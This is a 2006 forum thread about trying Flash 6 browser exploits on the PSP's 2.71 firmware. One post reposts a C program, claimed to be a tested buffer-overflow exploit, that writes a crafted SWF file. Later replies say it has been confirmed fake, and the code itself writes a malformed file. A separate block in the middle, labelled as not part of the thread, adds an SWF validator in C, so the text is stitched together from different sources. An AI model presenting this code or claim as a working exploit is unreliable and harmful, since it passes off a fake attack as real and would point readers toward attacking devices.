Dream_Killr
Jul 12 2006, 03:02 PM
As some people might already know, there were three exploits for Flash 6 for IE, Netscape, and other browsers. Has anyone tried these exploits for their PSP Flash? If anyone doesn't believe me they can read for themselves at
news And the version of flash for the psp is 6,0,72,27
Maybe there was an exploit in flash with fw 2.7 and that's why 2.71 came out to patch it, just a few ideas. By the way I'm not a hacker, I'm a stoner.
h3r3t1c
Jul 12 2006, 03:08 PM
hmmmmmmm..... u might be on to something
Dream_Killr
Jul 12 2006, 03:12 PM
QUOTE(h3r3t1c @ Jul 12 2006, 03:08 PM)

hmmmmmmm..... u might be on to something
It works on IE 6, but who knows if the PSP version is a port or isn't patched. It might work, but like I said I spend more time smoking pot than trying to hack lol
johny 5
Jul 14 2006, 02:05 PM
QUOTE(h3r3t1c @ Jul 12 2006, 01:08 PM)

hmmmmmmm..... u might be on to something
h3r3t1c, some people have found this exploit and have actually tried to do something with it, but they concluded that Sony has a different "edited" version of the flash player, and also if/when they try to launch the exploit they get the out of memory error
but this would probably be something to look towards rather than trying to find Sony's encryption key
Nicko01
Jul 19 2006, 12:00 PM
I have seen some people trying to use flash to edit the firmware of the psp for a downgrader. That would be a good thing to try.
timthy
Jul 22 2006, 01:56 AM
I hope this section of code is of help to everybody! This code comes from other hackers!
--------------------------------------------------------------------------------------
Originally Posted by coder X
Hello, Coder X here. Below is the code for a buffer overrun exploit I found using the PSP 2.71 flash browser plug-in
Anyone interested in using the exploit and making an e-loader, please give me credit for the exploit, and contact me, we can work together to make it.
This is a tested exploit and does work, so I hope you all enjoy, 2.71 uses Welcome to Homebrew
I will be working on a bin for the program so expect tetris or something out in a bit.
Code:
/*
* ************************* ************************* *********
* PSP FW 2.71 Overflow Test
************************* ************************* ***********
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";
//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";
//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00";
//[ShowFrame]
char ShowFrame[] = "\x40\x00";
//[End]
char End[] = "\x00\x00";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ************************* ************************* ******* *");
printf("\n* Sony you can kiss my ass, 2.71 Welcome to Homebrew *");
printf("\n* ************************* ************************* ******* *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldnt open!");
exit(1);
}
printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF), f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
Remember people, keep your pants on. This doesn't necessarily mean downgrader. This is just an exploit like the .tiff for 1.5 (except it's a swf and works differently)
----------------------------------------------------------------------------------------------
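Added example, not part of the thread and not coder X's code: a bounds-checked check of the SWF container (signature, FileLength field, tag record lengths), run on the first bytes the generator posted above writes and on a minimal well-formed file. The names `swf_check`, `posted_prefix` and `minimal_swf` are illustrative, and both byte arrays are constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum swf_status { SWF_OK, SWF_COMPRESSED, SWF_TRUNCATED,
                  SWF_BAD_SIGNATURE, SWF_BAD_LENGTH, SWF_BAD_TAG };
/* Constructed: first 9 bytes the posted generator writes ("<swf>" plus NUL, "\n", 0x43 0x02). */
static const uint8_t posted_prefix[] = { '<', 's', 'w', 'f', '>', 0, '\n', 0x43, 0x02 };
/* Constructed minimal SWF: header, empty RECT, frame rate, frame count, three tags. */
static const uint8_t minimal_swf[] = {
    'F', 'W', 'S', 6, 22, 0, 0, 0,  0x00,  0x00, 0x0c,  0x01, 0x00,
    0x43, 0x02, 0xff, 0x00, 0x00,  0x40, 0x00,  0x00, 0x00 };

static uint32_t le32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Check the 8-byte header, then walk tag records with bounds checks up to End. */
enum swf_status swf_check(const uint8_t *buf, size_t len, unsigned *tags) {
    *tags = 0;
    if (len < 9) return SWF_TRUNCATED;             /* header plus first RECT byte */
    if ((buf[0] != 'F' && buf[0] != 'C') || memcmp(buf + 1, "WS", 2) != 0)
        return SWF_BAD_SIGNATURE;
    if (buf[0] == 'C') return SWF_COMPRESSED;      /* zlib body, not walked here */
    if (le32(buf + 4) != len) return SWF_BAD_LENGTH;
    /* RECT is a 5-bit width n plus four n-bit fields; then rate and frame count. */
    size_t pos = 8 + (5 + 4 * (buf[8] >> 3) + 7) / 8 + 4;
    for (;;) {
        if (pos > len || len - pos < 2) return SWF_TRUNCATED;
        unsigned hdr = buf[pos] | buf[pos + 1] << 8;
        uint32_t tlen = hdr & 0x3f;                /* low 6 bits: short length */
        pos += 2;
        if (tlen == 0x3f) {                        /* long form: 32-bit length */
            if (len - pos < 4) return SWF_TRUNCATED;
            tlen = le32(buf + pos);
            pos += 4;
        }
        if (tlen > len - pos) return SWF_BAD_TAG;  /* length overruns the file */
        pos += tlen;
        ++*tags;
        if ((hdr >> 6) == 0) return SWF_OK;        /* tag code 0 is End */
    }
}

int main(void) {
    unsigned n;
    enum swf_status a = swf_check(posted_prefix, sizeof posted_prefix, &n);
    enum swf_status b = swf_check(minimal_swf, sizeof minimal_swf, &n);
    printf("posted prefix: %d, minimal swf: %d (%u tags)\n", a, b, n);
    return 0;
}
```

The posted generator's output is rejected at the signature check because it begins with the text `<swf>` rather than an SWF header.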
Webside
Jul 22 2006, 04:44 AM
are you serious timthy??!!
does this work??!!
and does this code only work with 2.71 or 2.60/2.70???
retaredmonkey
Jul 22 2006, 09:57 AM
yep that has been on a number of psp forums and has been confirmed fake
ghey
Jul 25 2006, 06:13 PM
The PSP uses a custom flash player and a custom web browser so imo i doubt that flash 6 exploits will work, exploits will have to be found for the PSP's version of flash!!!!
Well I don't really know much about flash apart from some actionscript.
ANYWAY THAT SCRIPT ISN'T ACTIONSCRIPT IT'S C++
Zevende
Jul 27 2006, 12:16 AM
QUOTE(ghey @ Jul 25 2006, 06:13 PM)

ANYWAY THAT SCRIPT ISN'T ACTIONSCRIPT IT'S C++
Technically it's C, lol.